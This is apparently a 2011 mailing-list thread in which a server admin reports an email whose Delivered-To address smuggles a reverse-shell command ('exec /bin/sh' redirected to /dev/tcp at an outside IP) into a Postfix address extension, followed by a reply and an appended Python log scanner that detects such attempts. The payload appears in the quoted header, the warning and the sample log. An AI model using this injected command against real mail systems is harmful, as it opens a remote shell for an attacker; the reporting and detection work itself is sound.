It seems the user was trying to get a shell delivered to their TCP stream. I
have heard of an exploit like this; it was plugged quite quickly though, so
as long as you are up to date you should be fine.
By the looks of it, Postfix blocked it as an illegal address so I wouldn't
worry too much; it will have delivered it as a normal email :)
Daniel
On 11 February 2011 09:29, Alastair Sherringham <sherringham(a)gmail.com> wrote:
I received an interesting email today. I only noticed because I had
logged in SSH and got the "you have new email" message. Reading via
"mail", I see:
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/87.106.250.176/45295
1>&0 2>&0"(a)calliope.bitfolk
Obviously some sort of possible exploit. The IP address 87.106.250.176
is Germany (1&1 Internet).
Postfix reported :
warning: 36FE51381A3: address with illegal extension: root+:|exec
/bin/sh 0</dev/tcp/87.106.250.176/45295 1>&0 2>&0
But it was delivered. I hope nothing bad has happened. (I am running
AIDE as we speak and digging around).
Cheers,
--
Alastair Sherringham
http://www.sherringham.net
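
A way to check mail logs for further attempts like the one in this thread, as an added example that is not part of either message: it scans log lines for the Postfix warning quoted above and reports the queue ID, any shell metacharacters in the address extension and any /dev/tcp target. The syslog prefix, the second and third sample lines and the function names are constructed for illustration, and "+" is assumed to be the recipient delimiter.

```python
import re

# The warning text as quoted in the thread. Whatever syslog prefix precedes
# "warning:" is ignored, so its exact layout is not assumed.
WARNING_RE = re.compile(
    r"warning: (?P<qid>[0-9A-Za-z]+): address with illegal extension: (?P<addr>.*)$"
)
# /dev/tcp-style redirection, as seen in the Delivered-To header in the thread.
DEV_TCP_RE = re.compile(r"/dev/(?:tcp|udp)/(?P<host>[^/\s]+)/(?P<port>\d+)")
# Heuristic (assumption): characters with no legitimate use in an extension.
SHELL_META = set("|;&<>`$")

# Constructed sample log. Only the warning text of the first line comes from
# the thread; timestamps, host name, PIDs and the other lines are made up.
SAMPLE_LOG = [
    "Feb 11 09:20:14 calliope postfix/local[2101]: warning: 36FE51381A3: "
    "address with illegal extension: root+:|exec /bin/sh "
    "0</dev/tcp/87.106.250.176/45295 1>&0 2>&0",
    "Feb 11 09:20:14 calliope postfix/local[2101]: 36FE51381A3: "
    "to=<root@calliope.example>, relay=local, status=sent (delivered to mailbox)",
    "Feb 11 09:31:02 calliope postfix/local[2140]: warning: 4A1B2C3D4E5: "
    "address with illegal extension: alice+lists/old",
]

def analyse_line(line):
    """Return a finding dict for an 'illegal extension' warning, else None."""
    m = WARNING_RE.search(line.rstrip("\n"))
    if not m:
        return None
    # Split user from extension at the first "+" (assumed recipient delimiter).
    user, _, ext = m.group("addr").partition("+")
    tcp = DEV_TCP_RE.search(ext)
    return {
        "queue_id": m.group("qid"),
        "user": user,
        "extension": ext,
        "shell_meta": sorted(SHELL_META & set(ext)),
        "callback": (tcp.group("host"), int(tcp.group("port"))) if tcp else None,
    }

def scan(lines):
    """Collect findings from an iterable of log lines."""
    return [f for f in map(analyse_line, lines) if f]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The queue ID in each finding can be used to look up the delivery record for the same message and confirm how it was handled.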